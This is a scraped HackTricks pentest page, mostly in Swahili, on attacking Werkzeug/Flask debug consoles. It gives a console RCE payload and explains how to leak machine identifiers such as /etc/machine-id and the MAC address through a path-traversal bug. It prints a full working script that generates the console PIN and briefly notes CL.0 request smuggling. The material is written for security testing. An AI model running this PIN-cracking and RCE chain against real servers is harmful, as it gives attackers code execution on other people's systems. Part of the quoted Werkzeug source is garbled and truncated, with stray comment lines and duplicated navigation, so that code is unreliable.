Werkzeug / Flask Debug

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Angalia mpango wa usajili!
Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au fuata sisi kwenye Twitter 🐦 @hacktricks_live.
Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.

Pata mtazamo wa hacker kuhusu programu zako za wavuti, mtandao, na wingu

Pata na ripoti udhaifu muhimu, unaoweza kutumiwa kwa faida halisi ya biashara. Tumia zana zetu zaidi ya 20 za kawaida kupanga uso wa shambulio, pata masuala ya usalama yanayokuruhusu kupandisha mamlaka, na tumia matumizi ya kiotomatiki kukusanya ushahidi muhimu, ukigeuza kazi yako ngumu kuwa ripoti za kushawishi.

Penetration testing toolkit, ready to usePentest-Tools.com

Console RCE

Ikiwa debug imewashwa unaweza kujaribu kufikia /console na kupata RCE.

__import__('os').popen('whoami').read();

Kuna pia exploits kadhaa mtandaoni kama hii au moja katika metasploit.

Pin Protected - Path Traversal

Katika baadhi ya matukio, /console endpoint itakuwa imehifadhiwa na pin. Ikiwa una file traversal vulnerability, unaweza kuvuja taarifa zote muhimu za kuunda pin hiyo.

Werkzeug Console PIN Exploit

Lazimisha ukurasa wa kosa la debug katika programu ili kuona hii:

The console is locked and needs to be unlocked by entering the PIN.
You can find the PIN printed out on the standard output of your
shell that runs the server

A message regarding the "console locked" scenario is encountered when attempting to access Werkzeug's debug interface, indicating a requirement for a PIN to unlock the console. The suggestion is made to exploit the console PIN by analyzing the PIN generation algorithm in Werkzeug’s debug initialization file (__init__.py). The PIN generation mechanism can be studied from the Werkzeug source code repository, though it is advised to procure the actual server code via a file traversal vulnerability due to potential version discrepancies.

To exploit the console PIN, two sets of variables, probably_public_bits and private_bits, are needed:

`probably_public_bits`

username: Inahusu mtumiaji aliyeanzisha kikao cha Flask.
modname: Kawaida inaitwa flask.app.
getattr(app, '__name__', getattr(app.__class__, '__name__')): Kawaida inasababisha Flask.
getattr(mod, '__file__', None): Inawakilisha njia kamili ya app.py ndani ya saraka ya Flask (mfano, /usr/local/lib/python3.5/dist-packages/flask/app.py). Ikiwa app.py haihusiki, jaribu app.pyc.

`private_bits`

uuid.getnode(): Inapata anwani ya MAC ya mashine ya sasa, huku str(uuid.getnode()) ikitafsiriwa kuwa katika muundo wa desimali.
Ili kubaini anwani ya MAC ya seva, mtu lazima atambue kiunganishi cha mtandao kinachotumika na programu (mfano, ens3). Katika hali za kutokuwa na uhakika, leak /proc/net/arp ili kupata kitambulisho cha kifaa, kisha toa anwani ya MAC kutoka /sys/class/net/<device id>/address.
Mabadiliko ya anwani ya MAC ya hexadecimal kuwa desimali yanaweza kufanywa kama inavyoonyeshwa hapa chini:

# Mfano wa anwani ya MAC: 56:00:02:7a:23:ac
>>> print(0x5600027a23ac)
94558041547692

get_machine_id(): Inachanganya data kutoka /etc/machine-id au /proc/sys/kernel/random/boot_id na mstari wa kwanza wa /proc/self/cgroup baada ya slash ya mwisho (/).

Code for `get_machine_id()`

```python def get_machine_id() -> t.Optional[t.Union[str, bytes]]: global _machine_id

if _machine_id is not None: return _machine_id

def _generate() -> t.Optional[t.Union[str, bytes]]: linux = b""

machine-id is stable across boots, boot_id is not.

for filename in "/etc/machine-id", "/proc/sys/kernel/random/boot_id": try: with open(filename, "rb") as f: value = f.readline().strip() except OSError: continue

if value: linux += value break

information. This is used outside containers too but should be

relatively stable across boots.

try: with open("/proc/self/cgroup", "rb") as f: linux += f.readline().strip().rpartition(b"/")[2] except OSError: pass

if linux: return linux

On OS X, use ioreg to get the computer's serial number.

try:

</details>

Baada ya kukusanya data zote muhimu, skripti ya exploit inaweza kutekelezwa ili kuunda PIN ya konsoli ya Werkzeug:

Baada ya kukusanya data zote muhimu, skripti ya exploit inaweza kutekelezwa ili kuunda PIN ya konsoli ya Werkzeug. Skripti inatumia `probably_public_bits` na `private_bits` zilizokusanywa ili kuunda hash, ambayo kisha inapitia mchakato zaidi ili kutoa PIN ya mwisho. Hapa chini kuna msimbo wa Python wa kutekeleza mchakato huu:
```python
import hashlib
from itertools import chain
probably_public_bits = [
'web3_user',  # username
'flask.app',  # modname
'Flask',  # getattr(app, '__name__', getattr(app.__class__, '__name__'))
'/usr/local/lib/python3.5/dist-packages/flask/app.py'  # getattr(mod, '__file__', None),
]

private_bits = [
'279275995014060',  # str(uuid.getnode()),  /sys/class/net/ens33/address
'd4e6cb65d59544f3331ea0425dc555a1'  # get_machine_id(), /etc/machine-id
]

# h = hashlib.md5()  # Changed in https://werkzeug.palletsprojects.com/en/2.2.x/changes/#version-2-0-0
h = hashlib.sha1()
for bit in chain(probably_public_bits, private_bits):
if not bit:
continue
if isinstance(bit, str):
bit = bit.encode('utf-8')
h.update(bit)
h.update(b'cookiesalt')
# h.update(b'shittysalt')

cookie_name = '__wzd' + h.hexdigest()[:20]

num = None
if num is None:
h.update(b'pinsalt')
num = ('%09d' % int(h.hexdigest(), 16))[:9]

rv = None
if rv is None:
for group_size in 5, 4, 3:
if len(num) % group_size == 0:
rv = '-'.join(num[x:x + group_size].rjust(group_size, '0')
for x in range(0, len(num), group_size))
break
else:
rv = num

print(rv)

Hii script inazalisha PIN kwa kuhashi bits zilizounganishwa, kuongeza chumvi maalum (cookiesalt na pinsalt), na kuunda muundo wa matokeo. Ni muhimu kutambua kwamba thamani halisi za probably_public_bits na private_bits zinahitaji kupatikana kwa usahihi kutoka kwa mfumo wa lengo ili kuhakikisha kwamba PIN iliyozalishwa inalingana na ile inayotarajiwa na konsole ya Werkzeug.

Ikiwa uko kwenye toleo la zamani la Werkzeug, jaribu kubadilisha algorithms ya kuhashi kuwa md5 badala ya sha1.

Makarakteri ya Unicode ya Werkzeug

Kama ilivyobainishwa katika tatizo hili, Werkzeug haifungi ombi lenye wahusika wa Unicode katika vichwa. Na kama ilivyoelezwa katika andika hii, hii inaweza kusababisha udhaifu wa CL.0 Request Smuggling.

Hii ni kwa sababu, Katika Werkzeug inawezekana kutuma wahusika wengine wa Unicode na itafanya seva ivunjike. Hata hivyo, ikiwa muunganisho wa HTTP ulianzishwa na kichwa Connection: keep-alive, mwili wa ombi hautasomwa na muunganisho utaendelea kuwa wazi, hivyo mwili wa ombi utaonekana kama ombio la HTTP linalofuata.

Utekelezaji wa Kiotomatiki

Marejeleo

Pata mtazamo wa hacker kuhusu programu zako za wavuti, mtandao, na wingu

Pata na ripoti udhaifu muhimu, unaoweza kutumiwa kwa faida halisi ya biashara. Tumia zana zetu zaidi ya 20 za kawaida kuandaa uso wa shambulio, pata masuala ya usalama yanayokuruhusu kupandisha mamlaka, na tumia matumizi ya kiotomatiki kukusanya ushahidi muhimu, ukigeuza kazi yako ngumu kuwa ripoti za kuvutia.

PreviousWebDav NextWordpress

Last updated 11 days ago

Console RCE

Pin Protected - Path Traversal

Werkzeug Console PIN Exploit

probably_public_bits

private_bits

machine-id is stable across boots, boot_id is not.

Containers share the same machine id, add some cgroup

information. This is used outside containers too but should be

relatively stable across boots.

On OS X, use ioreg to get the computer's serial number.

Makarakteri ya Unicode ya Werkzeug

Utekelezaji wa Kiotomatiki

Marejeleo

Console RCE

Pin Protected - Path Traversal

Werkzeug Console PIN Exploit

probably_public_bits

private_bits

machine-id is stable across boots, boot_id is not.

Containers share the same machine id, add some cgroup

information. This is used outside containers too but should be

relatively stable across boots.

On OS X, use ioreg to get the computer's serial number.

Makarakteri ya Unicode ya Werkzeug

Utekelezaji wa Kiotomatiki

Marejeleo

`probably_public_bits`

`private_bits`

`probably_public_bits`

`private_bits`